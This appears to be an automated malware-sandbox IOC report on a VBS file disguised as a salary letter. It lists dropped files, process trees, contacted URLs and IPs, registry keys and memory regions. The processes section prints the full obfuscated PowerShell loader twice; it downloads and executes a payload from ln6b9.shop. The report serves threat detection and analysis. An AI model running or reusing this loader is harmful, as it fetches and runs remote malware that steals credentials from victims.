IOC Report
Salary Increase Letter_Oct 2024.vbs

loading gif

Files

File Path
Type
Category
Malicious
Salary Increase Letter_Oct 2024.vbs
ASCII text, with very long lines (2232), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json
Unknown
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jgfagqx.hls.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_by2ssk52.nr3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0vvkzsf.0yf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xik3ehvu.jax.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvF097.tmp
Extensible storage user DataBase, version 0x620, checksum 0x8672f832, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Roaming\Lokumernes.sus
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Salary Increase Letter_Oct 2024.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gearstngers Checkoffs Unappealingly spectatress Asynkron Proglottis #>;$Romancy='Greyfly';<#Israelitter Dikotomien Pavens Dokumentbehandlings Xenophobia Nel #>;$Glossocomium44=$Velstandsstigning+$host.UI;If ($Glossocomium44) {$Kautioneringernes++;}function Perspicable($React){$Yecchs=$stactes+$React.'Length'-$Kautioneringernes; for( $Mglingernes=3;$Mglingernes -lt $Yecchs;$Mglingernes+=4){$Kordninger='Romancens';$Tudehovedets+=$React[$Mglingernes];$Tusindfryds='stenrkners';}$Tudehovedets;}function Unmudded($Listevalget){ & ($Bikarbonaters) ($Listevalget);}$Fagomraadernes=Perspicable ' I MFrsof.rzDiai splTollnedas r/Lgn5Bla.Wee0Dmo Win(NysWUnciAfhnl ad U oUnswOvese,u C N D TCey ste1Dem0Par.For0.ry; as aaW,luiTr.nJ,n6Hum4Cri;Pla skaxOpe6Gyr4s m;Per UrirUgevDiv:Er.1Hys2bet1slu.Hal0For)F,r re GForeVi.c s.kFagoKon/Emp2Gar0 No1s m0Aut0Co 1Ph,0 Ud1,po NiF HoiAzorspkesalfT doAgrxTis/Fre1Fej2gas1U,f.Amb0 u ';$Novelisers=Perspicable ' quuFiss P.EFedr ,v-T.oABnfg E e ensp T B. ';$stigma=Perspicable 'R,th V t yptstepFla:Vol/ i/A.gl tunFo 6sexb a9 Ga. Ens nhsouoR spDam/ dsIsndB Roo eld reHGlyWBreP FewHow/ scKNomo svkNokkDraeBesrObteAb r ChiEndnU sg Ar.stioCh.c Inx ev ';$Milieuers=Perspicable 'b r>Ben ';$Bikarbonaters=Perspicable ' asiKivE uXCh, ';$Paraffineredes='implicity';$stofmisbrugs='\Lokumernes.sus';Unmudded (Perspicable 'Usi$ flgEm L Reo Vab slA OmL Ha: CaFstuO opR erdIcom A Tjou= Ls$wheeVe,NPotv et:MonaFysPElsPA pdAi ATreTIntA,ro+ co$Laks rTVacOsenF orM raI DessveBEntrsakUPu gEubsBoh ');Unmudded (Perspicable 'Pol$ ftgManl tro unBsamAIntLPej: MtT whuD,mAT xr o EPargAre=bac$ .asAdrtArviIncg D,M naaGav.Tils LaPBetLBe.IPo T Tr(Unp$ColMagaisagLP eIskoELanuUndE.roRRe,sKon)Pla ');Unmudded (Perspicable 'Hel[smanAtteTritA k.DefsAnoe.lorKr v niiMa,C suE,krPferOsliiR,mNtr t agM efA vnNforAAn G .yEImpRW m]Kal:pri: KasF reMe cs,ruBalrsmaINobtH eystrP stRRenoBr.t B o sac.mao roLCh c o=Vib sov[ PiNUnbesnvtLet.Cars FoETryCRekU HeRstai TitTidY FlPCurRN.do Vat .eoLincResO silsent euyDepPMa e Pa]Ind: En:L,sTHealR,fs.el1 sl2sen ');$stigma=$Tuareg[0];$Lithol31=(Perspicable ' Ac$ krGPreLP eOKvaB omA all.no:s emAntoBipNG.oo TrNBaloslaM suiTndAP rNEje= TrnDy eU eWTil-PumOBunbsikJUdteOpecBopT,es sydsTynyF,ssHaltOuteM lmFev.M cn,hoeArmT sa. stWtoreIndB soCTirlYo i U eRanN HyT nt ');Unmudded ($Lithol31);Unmudded (Perspicable 'Tid$UnuM Kaopronpudo ven.imoEf mKoriBa a omnUly.sp,HGaleOpeaAdodoveeVi rskisUn.[Ven$C lNHohoExovAudeRu.lsaviJous MaeGngr DisGen] ef=Mi.$ roF sna.erg iso Trm str staO gaTurdIngeFilrFi nVane Grs,at ');$sabotren=Perspicable '.es$ stMBreo ManVenoCavnTe oTram spisknaE,dnMat.plaD Prot rwfrunUndls toInsaBihd NiFPr iFall KaeAva(hov$Kl s letBomiJatg somDekaspa,Gle$ RrLparyIntn eil amaValaIn sFore minM ssTys)sko ';$Lynlaasens=$Fordmt;Unmudded (Perspicable ' i$RudG eLNitO U,bstoA Pilsu,:s aU huFFa,oPamrpa.sKbsoslinCiflstiiPsyG GnsPieTH le sk=Eja(MastT,aeVensKubTTra- E,pXerA ort fdH mo F $WallIndy UnnsyrlVacaMilaHaesCe EFranB lsBen)sam ');while (!$Uforsonligste) {Unmudded (Perspicable ' Je$AnngMicl rao T.bNonaOmol ni:DavVFraiAr nR toansss aiFjetM kiNeme dksFno=I.t$Portplorsynu,rie la ') ;Unmudded $sabotren;Unmudded (Perspicable 'Zo sTusT reaPenRDertsp,-BorsCanl .aEU sEUnlp eg Tpp4H.l ');Unmudded (Perspicable ' e$NicgTunLUnioIntbsinaBruLCar:Oveu,ivf oOak r nfsFixosulNUnslsquiUplg ilsartt ubesal=A.d(DemtTheeHaes.unTRek- efp AraTr,tRegH Mu Per$ UvlBaryobsNTinLH.sa bla Ops UdeConNTols so) s ') ;Unmudded (Perspicable 'Lys$Ko,gA,bL ftO M BspiA ZoLEll: ToFMoroin rHjeKF glGlae taLBensOl.Es eRbo =Phy$,ntgUnsLHoooUnhbPunAW tLsa :Ac G muyIneg onI DesUdp+men+Bar% ek$Mu tForUFliAErgR ute.rugFjl.E lC teoCajUFjaNHe ts i ') ;$stigma=$Tuareg[$Forklelser];}$Flukily135=317872;$Dekodere=28798;Unmudded (Perspicable 'Var$ForGFrdlPhoOKonB slABall on: .lw.elAAchUCatKPerit ttsko Rau=Ext HinGCusEPretT.o-BovCUpsONumnTretPerE aan NeT Tr En$soulOpgy.arN Brl LaA evaKass,emEswinpapsBar ');Unmudded (Perspicable ' o$ R gAt l osoBrobKriaA rlskv:Obes L msaxe glschtBipe D oscas,sotshaeAlb Bre=smu Oms[ kksgenyAr s HetDraebe mDeg.sjaCEf,oBesnP.avAn e,ibr NetMrk]War: Li:IntFAttrDeloDvrmM,sB G a f.s KoePho6 or4radsHydtMisrPsyiOven afglit(udr$s iWPe aT,euBarkWoriUnctGon)Ita ');Unmudded (Perspicable 'kl $Bjrg.rhl BooUkrBD.va,aalPor:A,bBJakOR.ngd isUbeaHonmH nlBe eForRKomePen4Pre2Bie Reo=Rus M k[KursafnyLeas xttsepELinMDy .m.sTKame axE utCha. NoEsupN s,cDiso.ntDli,ITuanOscgBru]Ung: Bi:K ias isCracpu.IsmyIFoy.Im G lEs,gtPossshrttetRTrdi.liNM.lgTys(Fid$MorsFormL eEk nLOl TOldEBygosyns PeT arETon)B.n ');Unmudded (Perspicable 'Oen$Fidg MelOd Osymb itaBetl ak:Ta,dThlI onsEtcsWooiUltmBygI oL iEAderHinEMyoneffdTilE Fo=sun$ riBCh,o Amgs,asOveAAbsm AnlcarEsieRPyreLoe4Pan2Rio. prssymUBlobGresVe TMy rRekI un svg Ca( sv$.emFM llDaguBnkK uziGrnLst Y d 1Gen3 st5 yr, an$ ndDP.we D,k apo spD .oeIchRK je Bu)he ');Unmudded $dissimilerende;"
malicious
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\bacgpbljvxtooetxcadtvibkg"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\dchyitedjnlszkhbllyuyuwbhdzp"
malicious
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\ownrimoexwdxbqdncvlwjzqsqkiyhshe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
154.216.17.14
malicious
http://www.imvu.comr
unknown
http://geoplugin.net/json.gpy2
unknown
https://aefd.nelreports.net/api/report?cat=bingth
unknown
https://contoso.com/License
unknown
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.binK
unknown
http://geoplugin.net/json.gp1
unknown
http://www.nirsoft.net
unknown
https://aefd.nelreports.net/api/report?cat=bingaotak
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://geoplugin.net/json.gpxes
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://ln6b9.shop/IBodHWPw/Kokkerering.ocx
104.21.2.6
https://www.google.com
unknown
https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=EL
unknown
http://ln6b9.shop/IBodHWPw/Kokkerering.ocxXR
unknown
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bins
unknown
https://aka.ms/pscore6lB
unknown
http://geoplugin.net/json.gpI
unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://login.yahoo.com/config/login
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&
unknown
https://www.office.com/
unknown
http://nuget.org/NuGet.exe
unknown
http://geoplugin.net/json.gpf
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://www.imvu.compData
unknown
https://go.micro
unknown
http://geoplugin.net/json.gphy
unknown
http://www.imvu.com
unknown
https://aefd.nelreports.net/api/report?cat=wsb
unknown
https://contoso.com/Icon
unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
unknown
https://github.com/Pester/Pester
unknown
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin
104.21.2.6
http://geoplugin.net/json.gp
178.237.33.50
https://aefd.nelreports.net/api/report?cat=bingaot
unknown
http://ln6b9.shop
unknown
https://aefd.nelreports.net/api/report?cat=bingrms
unknown
https://www.google.com/accounts/servicelogin
unknown
https://aka.ms/pscore68
unknown
http://ln6b9.shop/NrFLrAda/NwiqNYffVolUqcmi160.bin0JdY
unknown
http://www.ebuddy.com
unknown
There are 39 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
geoplugin.net
178.237.33.50
ln6b9.shop
104.21.2.6

IPs

IP
Domain
Country
Malicious
154.216.17.14
unknown
Seychelles
malicious
178.237.33.50
geoplugin.net
Netherlands
104.21.2.6
ln6b9.shop
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-KC5V8F
time
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 7 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
552C000
trusted library allocation
page read and write
malicious
6A36000
heap
page read and write
malicious
9345000
direct allocation
page execute and read and write
malicious
6A1D000
heap
page read and write
malicious
80C0000
direct allocation
page execute and read and write
malicious
1ACF561F000
trusted library allocation
page read and write
malicious
69DA000
heap
page read and write
malicious
4F19000
heap
page read and write
2040E52D000
heap
page read and write
22448000
heap
page read and write
5513000
trusted library allocation
page read and write
4790000
heap
page read and write
1ACE5634000
trusted library allocation
page read and write
4F24000
heap
page read and write
4F2F000
heap
page read and write
7B40000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
2CA4000
heap
page read and write
4F1D000
heap
page read and write
3FF0000
trusted library allocation
page read and write
6AE0000
heap
page read and write
2040E436000
heap
page read and write
21F3F000
stack
page read and write
6949EFF000
stack
page read and write
3214000
heap
page read and write
4F1B000
heap
page read and write
7FFD34550000
trusted library allocation
page read and write
261F000
stack
page read and write
2040E476000
heap
page read and write
4190000
trusted library allocation
page read and write
4010000
trusted library allocation
page read and write
2CA4000
heap
page read and write
4F1B000
heap
page read and write
204101A6000
heap
page read and write
4F2F000
heap
page read and write
1ACFDF80000
heap
page read and write
226CB000
heap
page read and write
2040E479000
heap
page read and write
47B1000
heap
page read and write
4F2C000
heap
page read and write
6949BFE000
stack
page read and write
17F10FF000
stack
page read and write
2CA4000
heap
page read and write
6949AFE000
stack
page read and write
204101B3000
heap
page read and write
7CB5000
trusted library allocation
page read and write
1ACF55D1000
trusted library allocation
page read and write
2CA0000
heap
page read and write
2CA4000
heap
page read and write
226CB000
heap
page read and write
7E48000
heap
page read and write
2040E45A000
heap
page read and write
2040E43A000
heap
page read and write
2040E3FD000
heap
page read and write
2227E000
stack
page read and write
6A4E000
stack
page read and write
625000
stack
page read and write
2620000
heap
page read and write
7FFD344E0000
trusted library allocation
page execute and read and write
43C5000
remote allocation
page execute and read and write
690B000
stack
page read and write
307A000
heap
page read and write
307B000
heap
page read and write
7E7A000
heap
page read and write
5526000
trusted library allocation
page read and write
2681000
heap
page read and write
8130000
direct allocation
page read and write
68C0000
direct allocation
page read and write
2040E43C000
heap
page read and write
6949FFF000
stack
page read and write
67A0000
direct allocation
page read and write
6C92000
heap
page read and write
2CA4000
heap
page read and write
4822000
heap
page read and write
6A54000
heap
page read and write
7FFD34580000
trusted library allocation
page read and write
1ACFDA59000
heap
page read and write
17F248B000
stack
page read and write
3214000
heap
page read and write
4F25000
heap
page read and write
1ACF5899000
trusted library allocation
page read and write
68CD000
stack
page read and write
2A68000
heap
page read and write
247D000
stack
page read and write
2040E45B000
heap
page read and write
4F1E000
heap
page read and write
20410345000
heap
page read and write
223D0000
heap
page read and write
3FC0000
trusted library allocation
page read and write
204101C4000
heap
page read and write
29A6000
stack
page read and write
2203D000
stack
page read and write
1ACE60FE000
trusted library allocation
page read and write
1ACE3BD0000
trusted library allocation
page read and write
22448000
heap
page read and write
204101A1000
heap
page read and write
694A3FC000
stack
page read and write
1ACE3C50000
heap
page read and write
6A61000
heap
page read and write
22336000
direct allocation
page execute and read and write
47B1000
heap
page read and write
2040E407000
heap
page read and write
1ACFDAC7000
heap
page read and write
47C8000
heap
page read and write
1ACE54E0000
heap
page execute and read and write
307A000
heap
page read and write
1ACFDAF0000
heap
page read and write
224C2000
heap
page read and write
47C5000
heap
page read and write
8150000
direct allocation
page read and write
2040E41F000
heap
page read and write
806E000
stack
page read and write
6BD0000
direct allocation
page read and write
225DA000
heap
page read and write
22560000
heap
page read and write
6CDF000
heap
page read and write
2040E425000
heap
page read and write
2CA5000
heap
page read and write
4F1D000
heap
page read and write
4F1B000
heap
page read and write
7FFD34620000
trusted library allocation
page read and write
223D1000
heap
page read and write
47DA000
heap
page read and write
4F19000
heap
page read and write
2040E44D000
heap
page read and write
40C0000
heap
page readonly
226FB000
heap
page read and write
68D0000
heap
page read and write
6860000
heap
page readonly
1ACE5C95000
trusted library allocation
page read and write
4F18000
heap
page read and write
1ACE3A70000
heap
page read and write
1ACE60F7000
trusted library allocation
page read and write
4F2C000
heap
page read and write
2230B000
unclassified section
page execute and read and write
47EE000
heap
page read and write
1ACE3B70000
heap
page read and write
7FFD344CA000
trusted library allocation
page read and write
2040E479000
heap
page read and write
2CA5000
heap
page read and write
204101C4000
heap
page read and write
7A17000
stack
page read and write
4F28000
heap
page read and write
8120000
direct allocation
page read and write
272B000
heap
page read and write
47B0000
heap
page read and write
4F2C000
heap
page read and write
6800000
direct allocation
page read and write
4BFF000
unkown
page read and write
2040E41F000
heap
page read and write
4F2F000
heap
page read and write
2A7C000
heap
page read and write
22760000
unclassified section
page execute and read and write
6A54000
heap
page read and write
2A7B000
heap
page read and write
224C2000
heap
page read and write
204101C0000
heap
page read and write
40BE000
stack
page read and write
678B000
stack
page read and write
22682000
heap
page read and write
4F33000
heap
page read and write
204101C0000
heap
page read and write
7A40000
trusted library allocation
page read and write
2CA4000
heap
page read and write
7B80000
trusted library allocation
page read and write
2040E43B000
heap
page read and write
1ACFDD3E000
heap
page read and write
68D5000
heap
page read and write
17F1073000
stack
page read and write
20410324000
heap
page read and write
2040E52E000
heap
page read and write
28E0000
heap
page read and write
2040E3EC000
heap
page read and write
7FFD34650000
trusted library allocation
page read and write
1ACE3AFA000
heap
page read and write
6BF0000
direct allocation
page read and write
4F30000
heap
page read and write
2CA4000
heap
page read and write
4F11000
heap
page read and write
4F2F000
heap
page read and write
4DC5000
remote allocation
page execute and read and write
2CA5000
heap
page read and write
29AB000
stack
page read and write
7FFD344D0000
trusted library allocation
page execute and read and write
6C50000
heap
page read and write
307A000
heap
page read and write
4F11000
heap
page read and write
1ACF55B1000
trusted library allocation
page read and write
708B000
stack
page read and write
422F000
stack
page read and write
243C000
stack
page read and write
7FFD345C0000
trusted library allocation
page read and write
2040E529000
heap
page read and write
2D80000
heap
page read and write
1ACE5400000
trusted library allocation
page read and write
478F000
unkown
page read and write
17F13FE000
stack
page read and write
21FFE000
stack
page read and write
2283C000
unclassified section
page execute and read and write
6A56000
heap
page read and write
47B9000
heap
page read and write
17F147E000
stack
page read and write
1ACE72E1000
trusted library allocation
page read and write
3214000
heap
page read and write
4F11000
heap
page read and write
400000
system
page execute and read and write
5110000
trusted library allocation
page read and write
17F240B000
stack
page read and write
17F183E000
stack
page read and write
17F173E000
stack
page read and write
6A5A000
heap
page read and write
432E000
stack
page read and write
5381000
trusted library allocation
page read and write
6850000
heap
page read and write
6C63000
heap
page read and write
2040E42D000
heap
page read and write
2CA4000
heap
page read and write
4F30000
heap
page read and write
2CA4000
heap
page read and write
7A20000
trusted library allocation
page execute and read and write
6B0000
heap
page read and write
17F16B8000
stack
page read and write
22448000
heap
page read and write
2D9D000
heap
page read and write
1ACE3A7C000
heap
page read and write
7FFD343CC000
trusted library allocation
page execute and read and write
40D8000
trusted library allocation
page read and write
87E0000
direct allocation
page execute and read and write
3FE4000
trusted library allocation
page read and write
4889000
heap
page read and write
45C000
system
page execute and read and write
6A5A000
heap
page read and write
7FFD34600000
trusted library allocation
page read and write
7B10000
heap
page read and write
2041033F000
heap
page read and write
25DE000
stack
page read and write
34ED000
heap
page read and write
2040E479000
heap
page read and write
6AA6000
heap
page read and write
2040E466000
heap
page read and write
2040E407000
heap
page read and write
2040E43C000
heap
page read and write
80AC000
stack
page read and write
44D6000
trusted library allocation
page read and write
1ACE60E5000
trusted library allocation
page read and write
4180000
heap
page read and write
6C10000
heap
page read and write
2040E480000
heap
page read and write
7FFD34510000
trusted library allocation
page read and write
2041034A000
heap
page read and write
1ACE3BF0000
trusted library allocation
page read and write
4F1E000
heap
page read and write
30B0000
heap
page readonly
2040E3FD000
heap
page read and write
2900000
trusted library section
page read and write
4F37000
heap
page read and write
3214000
heap
page read and write
7CC0000
trusted library allocation
page read and write
6CB6000
heap
page read and write
4F1F000
heap
page read and write
674D000
stack
page read and write
6C48000
trusted library allocation
page read and write
6A54000
heap
page read and write
2D93000
heap
page read and write
4F1D000
heap
page read and write
7ACE000
stack
page read and write
2A40000
heap
page read and write
7FFD34520000
trusted library allocation
page read and write
4F37000
heap
page read and write
80E0000
direct allocation
page read and write
6E9E000
stack
page read and write
2212D000
stack
page read and write
7DEC000
stack
page read and write
2244A000
heap
page read and write
4F2F000
heap
page read and write
4F24000
heap
page read and write
4F3A000
heap
page read and write
17F238D000
stack
page read and write
7FFD34660000
trusted library allocation
page read and write
34ED000
heap
page read and write
4F19000
heap
page read and write
4F11000
heap
page read and write
7DF0000
trusted library allocation
page execute and read and write
694A1FD000
stack
page read and write
2040E3FD000
heap
page read and write
